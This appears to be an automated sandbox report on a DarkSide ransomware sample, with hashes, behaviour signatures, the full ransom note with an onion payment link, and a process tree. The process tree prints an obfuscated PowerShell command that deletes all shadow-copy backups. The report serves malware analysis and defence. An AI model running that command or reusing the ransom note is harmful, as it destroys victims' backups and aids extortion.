Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows11-21h2-x64

10

Ransomware...KB.exe

windows10-2004-x64

3

Ransomware...KB.exe

windows7-x64

7

Ransomware...KB.exe

windows10-2004-x64

3

Ransomware...KB.exe

windows10-ltsc_2021-x64

3

Ransomware...KB.exe

windows11-21h2-x64

3

Ransomware...KB.exe

windows11-21h2-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows11-21h2-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows11-21h2-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows11-21h2-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows7-x64

10

Ransomware...KB.exe

windows10-2004-x64

10

Ransomware...KB.exe

windows10-ltsc_2021-x64

10

Ransomware...KB.exe

windows11-21h2-x64

10

Resubmissions

25/03/2025, 15:11

250325-skmbpsxzaw 10

25/03/2025, 15:06

250325-sg1d6a1px2 10

25/03/2025, 15:01

250325-sd5jpsxyct 10

25/03/2025, 14:56

250325-sbdcfaxxgs 10

25/03/2025, 14:50

250325-r7ve6a1nv3 10

25/03/2025, 14:46

250325-r5ab7sxwhx 10

25/03/2025, 14:40

250325-r2c9paxwe1 10

05/02/2025, 10:25

250205-mgcefaslhw 10

05/02/2025, 10:17

250205-mbs51atmbk 10

05/02/2025, 09:15

250205-k785zs1pfn 10

Analysis

  • max time kernel
    72s
  • max time network
    75s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250313-en
  • resource tags

    arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25/03/2025, 14:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RansomwareSamples/DarkSide_16_01_2021_59KB.exe

  • Size

    59KB

  • MD5

    0ed51a595631e9b4d60896ab5573332f

  • SHA1

    7ae73b5e1622049380c9b615ce3b7f636665584b

  • SHA256

    243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60

  • SHA512

    9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5

  • SSDEEP

    768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1yl3RYY23W58:0x7Fu4/ihrhDTV1ylhZ58

Score
10/10
darksidecredential_accessdiscoveryexecutionransomwarespywarestealer

Malware Config

Extracted

Path

C:\Recovery\WindowsRE\README.754fe4f5.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW When you open our website, put the following data in the input form: Key: 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Darkside family
    darkside
  • Renames multiple (180) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Control Panel 1 IoCs
    defense_evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe
    C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe bcdedit /set shutdown /r /f /t 2
    1⤵
    • Sets desktop wallpaper using registry
    • System Location Discovery: System Language Discovery
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4304
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2080
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2624

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Recovery\WindowsRE\README.754fe4f5.TXT
    Filesize

    1KB

    MD5

    d4e176b40c4ea17f4870c34fad926d6e

    SHA1

    2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0

    SHA256

    7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c

    SHA512

    feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    aa0a32b11dca7b04f4cc5fe8c55cb357

    SHA1

    00e354fd0754a7d721a270cdc08f970b9a3f6605

    SHA256

    e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1

    SHA512

    1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    60e7cd795aff12805e5841a3751bf12f

    SHA1

    3f65ec950635bf4297c374544c2e62597e12124b

    SHA256

    35c01fbbe6381bb7a2e4cb7045b40aded20ae99df6022205ec5e972399cc5db4

    SHA512

    317c11a18446b7314c8313e1932253b4225ff290302449828cb4832957640089b0f276947fd6196d4bf6b063d94393bc00b9d3dee377c94136e06de0c660932c

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kw2ug4zx.kso.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/2080-1-0x00007FFBB29D3000-0x00007FFBB29D5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2080-2-0x0000022B747A0000-0x0000022B747C2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2080-11-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2080-12-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2080-13-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2080-16-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp

    Filesize

    10.8MB

    Download